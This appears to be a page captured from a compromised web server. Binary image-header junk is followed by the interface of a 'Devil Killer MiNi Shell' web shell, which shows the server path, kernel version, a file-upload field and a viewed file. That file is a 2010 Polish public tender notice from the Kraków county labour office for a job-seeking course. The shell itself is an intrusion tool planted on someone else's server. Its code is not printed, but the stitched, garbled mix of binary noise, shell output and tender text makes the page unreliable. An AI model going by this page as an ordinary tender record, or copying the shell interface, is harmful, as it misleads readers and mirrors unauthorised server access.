JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100427/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100427/98983-N-2010.html

<p class="kh_header"><b>Kraków: postępowanie o udzielenie zamówienia publicznego 
na zorganizowanie kursu pn. Zajęcia w ramach aktywnego poszukiwania pracy   
znak sprawy: ZP- 271/16/2010</b><br>
<b>Numer ogłoszenia: 98983 - 2010; data zamieszczenia: 27.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Pracy Powiatu Krakowskiego , ul. Mazowiecka 21, 30-019 Kraków, woj. małopolskie, tel. 012 2997425, 012 6237480, faks 012 6325215.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uppk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> postępowanie o udzielenie zamówienia publicznego 
na zorganizowanie kursu pn. Zajęcia w ramach aktywnego poszukiwania pracy   
znak sprawy: ZP- 271/16/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie kursu pod nazwą Zajęcia w ramach aktywnego poszukiwania pracy dla 240 osób bezrobotnych zarejestrowanych w Urzędzie Pracy Powiatu Krakowskiego. 
Szkolenie adresowane jest do osób mających trudności w poruszaniu się po rynku pracy. Celem aktywnego uczestnictwa w zajęciach Klubu Pracy jest, między innymi, zmiana postawy wobec siebie i swojej sytuacji, wzbudzanie aktywność oraz samodzielność.
Podczas szkolenia w Klubie Pracy uczestnicy:
a.	poznają podstawowe zagadnienia dotyczące rynku pracy oraz mechanizmy, które nim rządzą
b.	dokonują analizy lokalnego rynku pracy
c.	określają własną sylwetkę zawodową oraz dokonują bilansu swoich mocnych i słabych stron
d.	dopasowują swoje kwalifikacje, umiejętności oraz predyspozycje do oferty rynku pracy
e.	na podstawie wiedzy zdobywanej na zajęciach podejmują decyzję dotyczącą swojej przyszłości zawodowej
f.	nabywają wiedzę z zakresu technik oraz metod poszukiwania pracy a także przekonują się, że ich stosowanie jest potrzebne i skuteczne
g.	nawiązują kontakty pomocne w znalezieniu zatrudnienia.

Zajęcia w ramach aktywnego poszukiwania pracy prowadzi Lider Klubu Pracy, który w dużym stopniu decyduje o sukcesie działań realizowanych w Klubie. Lider to osoba cechująca się poczuciem odpowiedzialności, odpornością emocjonalną, logicznym rozumowaniem, empatią, zdolnościami interpersonalnymi, organizacyjnymi oraz kreatywnością. Główne zadania Lidera to: organizacja pracy Klubu, w tym planowanie i organizacja zajęć, prowadzenie spraw administracyjnych Klubu, zajęcia z aktywnego poszukiwania pracy.

1.	Program szkolenia, zawierający łącznie 55 godzin zegarowych zajęć teoretycznych (ok. 40 godz.) i praktycznych (ok. 15 godz.), winien zostać opracowany na podstawie podręcznika pt. Klub Pracy wydanego przez Ministerstwo Gospodarki, Pracy i Polityki Społecznej Warszawa 2003 oraz zawierać następujące moduły:
a.	Metody pracy w Klubie Pracy
b.	Reakcje na utratę pracy
c.	Analiza niepowodzeń w poszukiwaniu pracy
d.	Uczenie się a siła twórczego i pozytywnego myślenia
e.	Odkrywanie własnych umiejętności i możliwości
f.	Bilans umiejętności, możliwości i predyspozycji zawodowych
g.	Rynek pracy. Mity i rzeczywistość
h.	Własna firma - czy ja się do tego nadaję?
i.	Twój plan działania
j.	Dokumenty aplikacyjne
k.	Umiejętności interpersonalne
l.	Asertywność w poszukiwaniu pracy
m.	Znajdowanie ofert pracy
n.	Rozmowa wstępna z pracodawcą
o.	Rozmowa telefoniczna z pracodawcą
p.	Rozmowa kwalifikacyjna
q.	Jak się trzymać planu i jak się uodpornić na porażki
r.	Nowa praca
Ponadto, program szkolenia winien zostać opracowany zgodnie z wytycznymi zawartymi w rozporządzeniu Ministra Edukacji i Nauki z dnia 03 lutego 2006 w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 ., Nr 31, poz. 216).
2.	W trakcie pierwszych dwóch tygodni, tj. dziesięciu dni roboczych, odbywają się sesje szkoleniowe, których łączny czas realizacji wynosi 40 godzin zegarowych. W tym czasie uczestnicy zajęć zdobywają wiedzę teoretyczną oraz rozwijają praktyczne umiejętności poszukiwania pracy. 
3.	Trzeci tydzień przeznaczony jest na aktywne poszukiwanie pracy przez uczestników zajęć, podczas którego wypróbowują oni w praktyce nowe zachowania, metody oraz techniki poznane podczas szkolenia. Uczestnicy zajęć codziennie przychodzą do Klubu Pracy, gdzie zapoznają się z aktualnymi ofertami pracy, telefonują do pracodawców, relacjonują swoją aktywność z dnia poprzedniego, korzystają z indywidualnych porad Lidera tj. osoby prowadzącej zajęcia w Klubie Pracy, ćwiczą i doskonalą w parach umiejętności rozmowy kwalifikacyjnej, uaktualniają swoje strategie poszukiwań, piszą listy motywacyjne, wymieniają się doświadczeniami, ofertami pracy, motywują oraz wspierają. Łączny czas przewidziany na wspólne spotkania z Liderem oraz innymi członkami grupy w trzecim tygodniu zajęć  wynosi około 15 godzin zegarowych. Czas przewidziany na indywidualne działania poszczególnych osób jest nieograniczony.
4.	Wykonawca zapewni nadzór wewnętrzny przebiegu szkolenia służący podnoszeniu jakości kształcenia a także wskaże personalnie osobę za nadzór odpowiedzialną. Do oferty należy załączyć informację o sposobie sprawowania nadzoru z podaniem osoby za niego odpowiedzialnej.
5.	Wykonawca, przed rozpoczęciem szkolenia, zobowiązany będzie do przekazania uczestnikom harmonogramu realizowanych zajęć. 
6.	Wykonawca przeprowadzi zajęcia w ramach aktywnego poszukiwania pracy dla czterech odrębnych grup uczestników, w  czterech różnych lokalizacjach: 
a.	w Krzeszowicach, w których zajęcia realizowane będą w siedzibie UPPK Filia w Krzeszowicach, ul. Kościuszki 3. 
b.	w Słomnikach, w których zajęcia realizowane będą w siedzibie UPPK Filia w Słomnikach, ul. Kościuszki 64.
c.	w Krakowie, przy czym wskazanie lokalizacji, w której realizowane będą zajęcia w ramach aktywnego poszukiwania pracy należy do Wykonawcy. Zamawiający zastrzega jednak, aby miejsce, w którym odbywać się będą zajęcia znajdowało się w  mieście Krakowie i posiadało dogodny dojazd z terenu powiatu krakowskiego.  Do oferty należy załączyć informację o umiejscowieniu obiektu, w którym odbywać się będą zajęcia.
d.	w Skawinie zajęcia realizowane będą w Podkrakowskim Centrum Teleinformatycznym znajdującym się przy ul. Kopernika 13, przy czym to do Wykonawcy należeć będzie ustalenie z właścicielem pomieszczeń warunków, na jakich udostępnione zostaną mu pomieszczenia, w których przeprowadzi on zajęcia szkoleniowe. 
W  lokalizacjach wskazanych w punkcie 6 a) oraz 6 b) Zamawiający udostępni pomieszczenia będące w jego dyspozycji na cały czas realizacji zajęć nieodpłatnie. Wykonawca również będzie mógł korzystać - w związku z realizacją zamówienia - z części socjalnej Zamawiającego. 
7.	W okresie od miesiąca czerwca do listopada włącznie, w każdej z lokalizacji: w Krakowie, Krzeszowicach, Skawinie oraz Słomnikach, Wykonawca przeprowadzi trzytygodniowe zajęcia dla 10 - osobowych grup uczestników (jedna grupa w miesiącu w każdej z wymienionych lokalizacji). Oznacza to, że w sumie zajęcia przeprowadzone zostaną dla  dwudziestu czterech dziesięcioosobowych grup uczestników.
8.	Zajęcia, w ramach każdej grupy, zostaną zrealizowane w ciągu trzech tygodni i odbywać się w dniach od poniedziałku do piątku, w godzinach:
a.	dla lokalizacji w Krzeszowicach i Słomnikach - nie wcześniej niż od godz. 10:00 i nie później niż do godz. 15:00;
b.	dla lokalizacji w Skawinie i Krakowie - nie wcześniej niż od godz. 08:00 i nie później niż do godz. 18:00.
Pojedyncze spotkanie szkoleniowe trwać winno od 3 do 5 godzin zegarowych dziennie, łącznie z przerwami, i podczas jego trwania zrealizowane mogą zostać trzy małe bądź jedna duża sesja. 
9.	Zajęcia realizować będą równolegle czterej różnych Liderzy, którzy muszą spełniać warunek opisany w punkcie III. 3 SIWZ.  
10.	Wykonawca zapewni uczestnikom szkolenia warunki do nauki w oparciu o zasady BHP. Wykonawca zadba o odpowiednie wyposażenie sal dydaktycznych stosownie do potrzeb  realizacji zajęć dla 10-osobowych grup słuchaczy, tj. w miejsca siedzące, ławki/stoliki, sprzęt audiowizualny, flipchart, tablice szkolne i/lub magnetyczne a także telefony służące uczestnikom zajęć, w ramach każdej grupy, do przeprowadzania rozmów telefonicznych z potencjalnymi pracodawcami (dotyczy trzeciego tygodnia zajęć).  Do oferty należy dołączyć szczegółowy opis sal dydaktycznych oraz ich wyposażenia a także podać numery telefonów, po jednym w każdej lokalizacji, udostępnionych kursantom w celu, o którym mowa powyżej. 
11.	Wykonawca zapewni uczestnikom zajęć dostęp do serwisu kawowego w postaci kawy, herbaty, wody mineralnej, drożdżówek lub ciasteczek. 
12.	Wykonawca zapewni uczestnikom zajęć niezbędne materiały dydaktyczne oraz biurowe, których odbiór zostanie przez każdego słuchacza kursu potwierdzony poprzez podpisanie stosownego oświadczenia. Wykonawca zawrze w ofercie informację o rodzaju materiałów dydaktycznych i biurowych, w które wyposaży każdego uczestnika. 
13.	Na zakończenie kursu, w ramach wynagrodzenia należnego Wykonawcy  z tytułu realizacji szkolenia, Wykonawca wypłaci uczestnikom szkolenia zwrot kosztów przejazdu w wysokości 10,00 PLN (słownie: dziesięć złotych 00/100) za każdy dzień obecności na zajęciach. Na etapie sporządzania oferty i wyliczania całkowitego zwrotu kosztów przejazdu ujmowanych w preliminarzu należy przyjąć  założenie o pełnej, tj 100 %, frekwencji uczestników, która - na etapie realizacji umowy - zweryfikowana będzie na podstawie listy obecności uczestników zajęć. Zamawiający pokryje Wykonawcy nakłady poniesione z tytułu zwrotu kosztów przejazdu uczestników zajęć na podstawie list obecności. Kwotę zwrotu kosztów przejazdu należy wliczyć w cenę szkolenia wskazaną w formularzu ofertowym.
14.	Na podstawie art. 41 ust.7 i ust. 8 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r., Nr 69, poz. 415 z późn. zm.) Wykonawca zobowiązany będzie do ubezpieczenia uczestników szkolenia do następstw nieszczęśliwych wypadków, z wyjątkiem osób posiadających prawo do stypendium. Okres ubezpieczenia obejmie cały okres trwania szkolenia. W razie zaistnienia wypadku przy pracy, tj. okoliczności, o której mowa w art. 3 ust. 3 pkt. 4 ustawy z dnia 30 października 2002 r. o ubezpieczeniu społecznym z tytułu wypadków przy pracy i chorób zawodowych (Dz. U. z 2009 r., Nr 167, poz. 1322 z późn. zm), Wykonawca zobowiązany będzie do ustalenia przyczyn i okoliczności wypadku przy pracy - zgodnie z art. 5 ust. 1 pkt 4 przywołanej powyżej ustawy. Koszt ubezpieczenia NW wyliczony przy założeniu, iż wszyscy uczestnicy szkolenia będą podlegali ubezpieczeniu, należy wyszczególnić w preliminarzu oraz uwzględnić go w całkowitym koszcie szkolenia ujmowanym w formularzu ofertowym. Zamawiający przedstawi Wykonawcy imienną listę osób wskazanych do ubezpieczenia. Wykonawca przedstawi Zamawiającemu kopię polisy ubezpieczeniowej najpóźniej w dniu rozpoczęcia zajęć. 
15.	Na zakończenie szkolenia jego uczestnicy otrzymają:
a.	zaświadczenie o ukończeniu szkolenia
b.	opis umiejętności zdobytych w ramach poszczególnych bloków tematycznych.  
16.	Zamawiający zastrzega sobie prawo do niezapowiedzianych wizyt monitorujących oraz przeprowadzenia kontroli przebiegu szkolenia pod względem poprawności realizacji umowy a także wglądu do dokumentacji szkoleniowej.
17.	Na zakończenie zajęć Wykonawca przeprowadzi wśród uczestników szkolenia ankietę oceniającą stanowiącą załącznik nr 8 do SIWZ, której wyniki przedstawi Zamawiającemu w postaci zbiorczego opracowania prezentującego oceny uczestników zajęć jak również samych ankiet.
18.	Wykonawca zobowiązany będzie do prowadzenia odpowiedniej dokumentacji: 
a.	dziennika zajęć zawierającego listę obecności, wymiar godzin i tematy zajęć edukacyjnych;
b.	dziennej listy obecności;
c.	imiennej listy, na której uczestnicy szkolenia będą potwierdzać otrzymanie zwrotu kosztów przejazdu na szkolenie;
d.	rejestru wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia; 
19.	Wykonawca zobowiązany jest do bieżącego informowania Zamawiającego na piśmie, pod rygorem odmowy zapłaty za przedmiot umowy, o:
a.	niezgłoszeniu się na rozpoczęcie kursu osób skierowanych,
b.	nieobecnościach na kursie osób skierowanych wraz z posiadanymi dokumentami dotyczącymi absencji na zajęciach kursu,
c.	rezygnacji z uczestnictwa w kursie osób skierowanych,
20.	Wykonawca zobowiązany jest do przekazania Zamawiającemu w terminie 5 dni od dnia zakończenia szkolenia następujących dokumentów:
a.	oryginału imiennego wykazu osób, które ukończyły kurs;
b.	oryginału imiennego wykazu osób, które nie ukończyły kursu
c.	oryginału rejestru wydanych zaświadczeń 
d.	oryginału listy potwierdzającej odbiór kosztów przejazdu;
e.	oryginałów oświadczeń uczestników, dotyczących odbioru materiałów dydaktycznych i biurowych;
f.	oryginału kosztorysu podwykonawczego;
g.	kserokopii listy obecności;
h.	kserokopii polisy ubezpieczeniowej;
i.	kserokopii dziennika zajęć;
j.	innej dokumentacji niezbędnej do rozliczenia kursu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga się wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek określony w punkcie 1 został spełniony w sytuacji, gdy Wykonawca oświadczy, że uzyskał wpis do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej poprzez załączenie do oferty stosownego oświadczenia (załącznik nr 9 do SIWZ) o podleganiu wpisowi do rejestru instytucji szkoleniowych;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek określony w punkcie 3b) został spełniony, w sytuacji gdy Wykonawca wykaże w Wykazie narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy, że dysponuje lub będzie dysponował czterema działającymi telefonami stacjonarnymi lub komórkowymi oraz wskaże ich numer.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek określony w punkcie 3a) został spełniony, w sytuacji gdy Wykonawca wykaże w Wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia, że dysponuje lub będzie dysponował co najmniej czterema osobami uczestniczącymi w wykonaniu  zamówienia, które posiadają uprawnienia do prowadzenia 3 - tygodniowych szkoleń osób bezrobotnych i poszukujących pracy w zakresie aktywnego poszukiwania pracy w oparciu o program szkolenia Klub Pracy;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Certyfikat jakości usług potwierdzający wysoki standard świadczonych usług szkoleniowych (np. akredytacja kuratora oświaty, certyfikat systemu zarządzania jakością kształcenia/szkolenia wydany na podstawie międzynarodowych norm ISO, itp.), jeżeli Wykonawca takim dysponuje.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy - załącznik nr 1 do SIWZ;
2.	Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust.1 ustawy z dn. 29 stycznia 2004 r. Prawo zamówień publicznych -  załącznik  nr 2 do SIWZ; 
3. Oświadczenie o podleganiu wpisowi do rejestru instytucji szkoleniowych prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej - załącznik nr 9 do SIWZ.
4.	Szczegółowy program szkolenia opracowany na podstawie wytycznych zawartych w punkcie I. 1. SIWZ;
5.	Harmonogram zajęć rozpisany na poszczególne grupy, dni i godziny trwania szkolenia z podaniem zakresu tematycznego  i rodzaju zajęć, czasu ich trwania oraz nazwiska osoby prowadzącej. W harmonogramie należy również uwzględnić realizację zajęć w ramach trzeciego tygodnia Klubu Pracy.
6. 	Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji Wykonawcy osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w punkcie 7, Wykonawca wskazał osoby, którymi będzie dysponował. Dotyczy sytuacji, w której Wykonawca będzie polegać na osobach zdolnych do wykonania zamówienia innych podmiotów. 
8.	Pełnomocnictwo dla osoby podpisującej ofertę lub inny dokument, z którego wynikać będzie jej umocowanie do reprezentowania Wykonawcy w postępowaniach przetargowych, w tym podpisywania dokumentów przetargowych;
9.	Formularz dotyczący podwykonawców z określeniem ich udziału w wykonywaniu zamówienia - załącznik nr 5 do SIWZ;
10.	Preliminarz kosztów - załącznik nr 6 do SIWZ.
11.	Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji Wykonawcy zasobów niezbędnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w punkcie 14, Wykonawca wskazał zasoby, którymi będzie dysponował. Dotyczy sytuacji, w której Wykonawca będzie polegać na zasobach innych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Posiadanie przez Wykonawcę certyfikatu jakości usług, który potwierdzałby wysoki standard świadczonych usług - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy. Wprowadzone zmiany dotyczyć mogą terminu realizacji umowy w przypadku wystąpienia okoliczności niezależnych od Zamawiającego lub Wykonawcy, ograniczenia zakresu przedmiotu zamówienia, w szczególności w przypadku powstania okoliczności powodujących, że wykonanie tego zakresu nie leży w interesie publicznym oraz okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Zmiany wprowadzone zostaną po wcześniejszym zgłoszeniu przez którąkolwiek ze stron umowy, faktu zaistnienia okoliczności warunkującej konieczność wprowadzenia zmiany oraz obustronnej ich akceptacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uppk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD PRACY POWIATU KRAKOWSKIEGO
KRAKÓW, ul. Mazowiecka 21, IX piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2010 godzina 10:00, miejsce: URZĄD PRACY POWIATU KRAKOWSKIEGO
KRAKÓW, ul. Mazowiecka 21, IX piętro, stanowisko dziennika podawczego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





